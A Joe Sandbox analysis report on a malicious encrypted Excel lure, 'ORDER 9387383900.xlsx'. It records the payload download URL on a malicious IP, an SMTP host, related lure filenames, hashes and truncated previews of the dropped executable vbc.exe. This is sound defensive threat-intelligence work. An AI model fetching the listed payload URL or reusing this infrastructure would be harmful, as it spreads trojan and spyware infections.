https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	vbc.exe, 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.23.213.61	unknown	United States		36352	AS-COLOCROSSINGUS	true
208.91.199.225	us2.smtp.mailhostbox.com	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385366
Start date:	12.04.2021
Start time:	11:33:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDER 9387383900.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@6/10@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.1% (good quality ratio 1.3%) Quality average: 42% Quality standard deviation: 38.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 146 Number of non-executed functions: 27
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:34:56	API Interceptor	81x Sleep call for process: EQNEDT32.EXE modified
11:34:59	API Interceptor	829x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.23.213.61	PO PR 111500976.xlsx	Get hash	malicious	Browse	198.23.213.61/ooo.exe
208.91.199.225	usd 420232.exe	Get hash	malicious	Browse
	P037725600.exe	Get hash	malicious	Browse
	VAT INVOICE.exe	Get hash	malicious	Browse
	New Order PO#121012020_____PDF_______.exe	Get hash	malicious	Browse
	swift Copy.xls.exe	Get hash	malicious	Browse
	AD1-2001028L.exe	Get hash	malicious	Browse
	AD1-2001028L (2).exe	Get hash	malicious	Browse
	#U7f8e#U91d1#U532f#U738728.84 (USD 40,257+5% #U7a05.exe	Get hash	malicious	Browse
	balance payment.exe	Get hash	malicious	Browse
	Image0001.exe	Get hash	malicious	Browse
	money.exe	Get hash	malicious	Browse
	new order.doc	Get hash	malicious	Browse
	New Enquiry.MORROCCO.exe	Get hash	malicious	Browse
	Purchase Order #07916813.exe	Get hash	malicious	Browse
	QUOTATION 03-28-2021.exe	Get hash	malicious	Browse
	PURCHASE ORDER COPY.exe	Get hash	malicious	Browse
	credit notification.exe	Get hash	malicious	Browse
	PURCHASE ORDER COPY.exe	Get hash	malicious	Browse
	Ref_0866_0817.doc	Get hash	malicious	Browse
	378753687654345678345602.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
us2.smtp.mailhostbox.com	Payment Advice Note from 02.04.2021 to 608761.exe	Get hash	malicious	Browse	208.91.199.223
	e0xd7qhFaMk3Dpx.exe	Get hash	malicious	Browse	208.91.198.143
	PAGO FACTURA V-8680.exe	Get hash	malicious	Browse	208.91.198.143
	usd 420232.exe	Get hash	malicious	Browse	208.91.199.225
	P037725600.exe	Get hash	malicious	Browse	208.91.199.225
	VAT INVOICE.exe	Get hash	malicious	Browse	208.91.199.224
	VAT INVOICE.exe	Get hash	malicious	Browse	208.91.199.225
	NEW ORDER.exe	Get hash	malicious	Browse	208.91.198.143
	TRANSFERENCIA AL EXTERIOR U810295.exe	Get hash	malicious	Browse	208.91.198.143
	PAYMENT SWIFT COPY MT103.exe	Get hash	malicious	Browse	208.91.198.143
	UPDATED SOA.exe	Get hash	malicious	Browse	208.91.199.224
	BANK PAYMENT.exe	Get hash	malicious	Browse	208.91.199.224
	VAT INVOICE.exe	Get hash	malicious	Browse	208.91.199.224
	IMG_00000000001.PDF.exe	Get hash	malicious	Browse	208.91.198.143
	New Order PO#121012020_____PDF_______.exe	Get hash	malicious	Browse	208.91.198.143
	swift Copy.xls.exe	Get hash	malicious	Browse	208.91.199.225
	FN vw Safety 1 & 2.exe	Get hash	malicious	Browse	208.91.199.223
	MV TBN.uslfze.exe	Get hash	malicious	Browse	208.91.199.224
	purchase order.exe	Get hash	malicious	Browse	208.91.199.223
	AD1-2001028L.exe	Get hash	malicious	Browse	208.91.199.225

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	Payment Advice Note from 02.04.2021 to 608761.exe	Get hash	malicious	Browse	208.91.199.223
	Dubai REGA 2021UAE.exe	Get hash	malicious	Browse	208.91.199.135
	e0xd7qhFaMk3Dpx.exe	Get hash	malicious	Browse	208.91.198.143
	Dridex.xls	Get hash	malicious	Browse	208.91.199.159
	documents-351331057.xlsm	Get hash	malicious	Browse	162.251.80.27
	documents-351331057.xlsm	Get hash	malicious	Browse	162.251.80.27
	DUBAI UAEGH092021.exe	Get hash	malicious	Browse	208.91.199.135
	PAGO FACTURA V-8680.exe	Get hash	malicious	Browse	208.91.198.143
	documents-1819557117.xlsm	Get hash	malicious	Browse	162.251.80.27
	documents-1819557117.xlsm	Get hash	malicious	Browse	162.251.80.27
	usd 420232.exe	Get hash	malicious	Browse	208.91.199.225
	P037725600.exe	Get hash	malicious	Browse	208.91.199.225
	VAT INVOICE.exe	Get hash	malicious	Browse	208.91.199.224
	VAT INVOICE.exe	Get hash	malicious	Browse	208.91.199.224
	NEW ORDER.exe	Get hash	malicious	Browse	208.91.198.143
	TRANSFERENCIA AL EXTERIOR U810295.exe	Get hash	malicious	Browse	208.91.198.143
	PAYMENT SWIFT COPY MT103.exe	Get hash	malicious	Browse	208.91.198.143
	UPDATED SOA.exe	Get hash	malicious	Browse	208.91.199.224
	BANK PAYMENT.exe	Get hash	malicious	Browse	208.91.199.224
	document-1245492889.xls	Get hash	malicious	Browse	5.100.155.169
AS-COLOCROSSINGUS	12042021493876783,xlsx.exe	Get hash	malicious	Browse	198.46.204.38
	intercom.exe	Get hash	malicious	Browse	192.3.26.107
	SecuriteInfo.com.Trojan.PWS.Stealer.30255.24265.exe	Get hash	malicious	Browse	192.210.198.12
	SecuriteInfo.com.W32.AIDetect.malware1.12135.exe	Get hash	malicious	Browse	192.210.198.12
	Payment INVOICE4552U224Y.docx	Get hash	malicious	Browse	107.173.219.80
	Payment INVOICE4552U224Y.docx	Get hash	malicious	Browse	107.173.219.80
	doc_details.exe	Get hash	malicious	Browse	192.3.190.242
	payment copy 090054.xlsx	Get hash	malicious	Browse	198.23.207.121
	DHL Shipping doc & Shipment tracking details.docx	Get hash	malicious	Browse	23.95.122.24
	dot.dot	Get hash	malicious	Browse	23.95.122.24
	New Order for April#89032.xlsx	Get hash	malicious	Browse	198.23.174.104
	PO PR 111500976.xlsx	Get hash	malicious	Browse	198.23.213.61
	Revised Proforma.xlsx	Get hash	malicious	Browse	198.23.207.115
	7yTix20XaT.rtf	Get hash	malicious	Browse	198.23.251.121
	Inquiry.docx	Get hash	malicious	Browse	198.23.251.121
	order1562.docx	Get hash	malicious	Browse	198.23.251.121
	order1562.docx	Get hash	malicious	Browse	198.23.251.121
	lF5VYmf6Tm.exe	Get hash	malicious	Browse	192.3.26.107
	P.O_RFQ0098765434.xlsx	Get hash	malicious	Browse	198.46.132.132
	Payment Proof.xlsx	Get hash	malicious	Browse	198.23.174.104

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	908288
Entropy (8bit):	7.684156698361381
Encrypted:	false
SSDEEP:	24576:4FRSVYNp2zQ7GGGaw7nJm7vooyqXRiuDWYTf:4HlNEUdGZ7nCgvK3DW
MD5:	ABEB7AA739C4F99C996B91E51A1FA885
SHA1:	A0DBD11A666DBA40556F7131D5845A061769A62F
SHA-256:	428039D6537A6684C3825BC678F9939754A71E346A8BF5D50B9DABFDCE19ACFF
SHA-512:	0CA016AF9A1CDB7D1395AAD1503EF3C3FA9560BE948B4F698C428E88A475494F0BF79B31A9D17606B9CA84EB3EC7E9E22B3CB06F666C681AD9ABA948F2AE2A63
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://198.23.213.61/rrr.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t`..............P.................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........................................................................0..#.......+.&...(....(..........(.....o.......................0..#.......+.&..8......8.....+:..ca.+...ja...oXE............'...]....](.....+......&...+..b(......d(.....+...\XE............!......9...H...V..._...z..........+.8y.......8p.....j(.....8b.......8Y.....(.......8J.....(.......8;........&...8-.......8$.....(....+.(....8.......8......(....+..8.......8....*..0..........+.&...+A..qa.+...ja8p.....kY

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CF4807.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 294 x 262, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	20455
Entropy (8bit):	7.971919017844605
Encrypted:	false
SSDEEP:	384:brrClKSmZ1oI21dlIsZyc++ZeZhJV5nmVOpheJG3u8ItmJIJ:rClKSmZ1oIFcheZhJV5nrS+urmSJ
MD5:	4BE445245B4530E9136AA45ECC8D18FB
SHA1:	83810AE3E998B2EDD2FCB72A19E558D7D8E334B4
SHA-256:	5521F2BF794D82C2C2638841118176A4D1924F049A1F545E1C4E85F375021783
SHA-512:	E836B244C884854650388635289C62C490A6DC8585CD7DAAC649D9AB5339CD9A5C419DC7ED4778B6AF77904F3BAA976DBC447F8EE503DEC45DC293FFB23E5B20
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...&..........h8.....pHYs..........(J... .IDATx..w.]U..?k.....K.....HHB .`.B.......{.^.\.~.+...H....J..Z*.L2}..){.....9s..A....<O......Z..[m/.9s4....E.#.....`8..Ig\|G.X..wo6........!z...!L...R.....M......F)...CJ.K.\|=/.R.8.RJ...Y....#.....`0.S.!..bl..g.y.g.y....e..J.SZ.R..L&.....,.g...e.`0.....S^^.i.2e...z+.......8..).TJ).,X...q..!.i.......5Zkf..-[......c.H&....3w...E}.......%.:SJ.0w.\.{.1.....\IJO.Hux..a.....##J...$SW....8.p8....<&.5.eu.(.........'.....q.%..K.....n...d.%..p.x7}yWa2.....F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45AE4F8B.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 294 x 262, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	20455
Entropy (8bit):	7.971919017844605
Encrypted:	false
SSDEEP:	384:brrClKSmZ1oI21dlIsZyc++ZeZhJV5nmVOpheJG3u8ItmJIJ:rClKSmZ1oIFcheZhJV5nrS+urmSJ
MD5:	4BE445245B4530E9136AA45ECC8D18FB
SHA1:	83810AE3E998B2EDD2FCB72A19E558D7D8E334B4
SHA-256:	5521F2BF794D82C2C2638841118176A4D1924F049A1F545E1C4E85F375021783
SHA-512:	E836B244C884854650388635289C62C490A6DC8585CD7DAAC649D9AB5339CD9A5C419DC7ED4778B6AF77904F3BAA976DBC447F8EE503DEC45DC293FFB23E5B20
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...&..........h8.....pHYs..........(J... .IDATx..w.]U..?k.....K.....HHB .`.B.......{.^.\.~.+...H....J..Z*.L2}..){.....9s..A....<O......Z..[m/.9s4....E.#.....`8..Ig\|G.X..wo6........!z...!L...R.....M......F)...CJ.K.\|=/.R.8.RJ...Y....#.....`0.S.!..bl..g.y.g.y....e..J.SZ.R..L&.....,.g...e.`0.....S^^.i.2e...z+.......8..).TJ).,X...q..!.i.......5Zkf..-[......c.H&....3w...E}.......%.:SJ.0w.\.{.1.....\IJO.Hux..a.....##J...$SW....8.p8....<&.5.eu.(.........'.....q.%..K.....n...d.%..p.x7}yWa2.....F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C9F6B5.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1316
Entropy (8bit):	3.231952653147437
Encrypted:	false
SSDEEP:	24:YCoj/Bu99E/B08nV3DaBIyEvkxglYGPnSZcRO2:qbXVYI7vkO1SN2
MD5:	4FA847E6C8056B31A5F0F4B7C3D9CCF6
SHA1:	597549E70D2C312DD28DAC68E8E6BC4AF7ACCCE2
SHA-256:	ACAF685D01DFC758C527F08DAD673786202110469428637D26A53FA964FBEF95
SHA-512:	168111BCAE03070B06917A8CF789727146DB82ECFA076794F4609F04B1844790CFA1B4F64AD79E1BDA8937705051CB9DBD3DE09689C4FF7796BE8EA33D0E54FC
Malicious:	false
Reputation:	low
Preview:	....l............................I..n... EMF....$.......................V...........................fZ..U"..F...4...&...GDIC.........^T...............................................................................-.........!..................................................................................@..Calibri..1.L....p....Iww@.zw..f.....-.................2.................Label1................'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?....................................................................................................R...p................................@..C.a.l.i.b.r.i.................................................................zw........................0...............<....e]w......Yw5..[....pe]w.e]w.....Z...... ........?...?..................<........... ...<....]]w.]]w...,.....L......8...............

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C21E6C10.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D0E8725C.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3AA532.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	663104
Entropy (8bit):	2.965273617796436
Encrypted:	false
SSDEEP:	3072:Y34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSy7u50yknG/qc+B:i4UcLe0JOqQQZR8MDdATCR3tSRjqcy
MD5:	C4321C85D61A995BB80A5ECD394CC221
SHA1:	F361F7AFAB356415EC6655DC637553BE174567F7
SHA-256:	C22EED7CE47FE475B4765D04D44DC31A54D70ECDEBF42683F24AFED854A9C51E
SHA-512:	7DA08D9223B8D193BE36BF98A7E1DD6088D20BAC2A723746531560D8D4B28844EA168696BBFA156FEA64088665DD8EE2902AF74A365D6231B05C02A92DE144E0
Malicious:	false
Reputation:	low
Preview:	....l............................h...>.. EMF....@...................................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...........R...p................................@..C.a.m.b.r.i.a. .M.a.t.h............................................. ................N.[....\|...........h....N.[....\|... ....y\V\|....... ............z\V............................................X..."...A.................... .B................C.a.m.b.r.i... .M.a.t.h...${.....B}......2UV.................{SV............dv......%...........%...........%...........R...p................................@..C.a.m.b.r.i.a. .M.a.t.h...........................................................RV"...p.Aw\...b.\V.@}.".......\|0....\V ....y\V...... ........0...z\V...............................2".........d....."...A...........p0..\|0... .B................

C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	241332
Entropy (8bit):	4.206799202337516
Encrypted:	false
SSDEEP:	1536:cG1LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cANNSk8DtKBrpb2vxrOpprf/nVq
MD5:	4F3F9FDF02EDABE0217F80DAEB24F300
SHA1:	3AE00A6FE91DA38202C32F516E63D27F7B48F032
SHA-256:	96875F8F702463D54345CCC3AE6442E40DB78C03A9B504F45CB9F3A59713FD35
SHA-512:	BD87065CA3E942EC45FDE91796EE394D45E288E53210B1B39E2DDBA66D2B0BD3C1E5B36C95864EA386447AD3BF0109E550091E66A49ED12A2180B12C4E99287B
Malicious:	false
Reputation:	low
Preview:	MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................

C:\Users\user\Desktop\~$ORDER 9387383900.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	908288
Entropy (8bit):	7.684156698361381
Encrypted:	false
SSDEEP:	24576:4FRSVYNp2zQ7GGGaw7nJm7vooyqXRiuDWYTf:4HlNEUdGZ7nCgvK3DW
MD5:	ABEB7AA739C4F99C996B91E51A1FA885
SHA1:	A0DBD11A666DBA40556F7131D5845A061769A62F
SHA-256:	428039D6537A6684C3825BC678F9939754A71E346A8BF5D50B9DABFDCE19ACFF
SHA-512:	0CA016AF9A1CDB7D1395AAD1503EF3C3FA9560BE948B4F698C428E88A475494F0BF79B31A9D17606B9CA84EB3EC7E9E22B3CB06F666C681AD9ABA948F2AE2A63
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t`..............P.................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........................................................................0..#.......+.&...(....(..........(.....o.......................0..#.......+.&..8......8.....+:..ca.+...ja...oXE............'...]....](.....+......&...+..b(......d(.....+...\XE............!......9...H...V..._...z..........+.8y.......8p.....j(.....8b.......8Y.....(.......8J.....(.......8;........&...8-.......8$.....(....+.(....8.......8......(....+..8.......8....*..0..........+.&...+A..qa.+...ja8p.....kY

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.987533610374864
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	ORDER 9387383900.xlsx
File size:	379392
MD5:	6cd928e3be0956061f518082a5acb60b
SHA1:	0e377a42bd4197fceb15e458ccfb46445e7f0132
SHA256:	19a975e2303b2394ab8ec3550799702b6a6a1eb166c588e90619e2c117baf73f
SHA512:	d9654dedf72542e326a20c0d151111b5b80929ca7c447071897046ffb24c00d1601ad790c8abcc3893ed75f99415359e0b98c431f2ea3450888c9dd66b2fca24
SSDEEP:	6144:RyT0CRmNtvySlIWXP5qVwqNglfqmzs1bZNgWWYnJapvfVRLNlbXdxWruoV60Adm/:4z4tqSCWKbGSvFPWYJmFVNl5xWJU0Em/
File Content Preview:	........................>.......................................................................\|..............................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "ORDER 9387383900.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
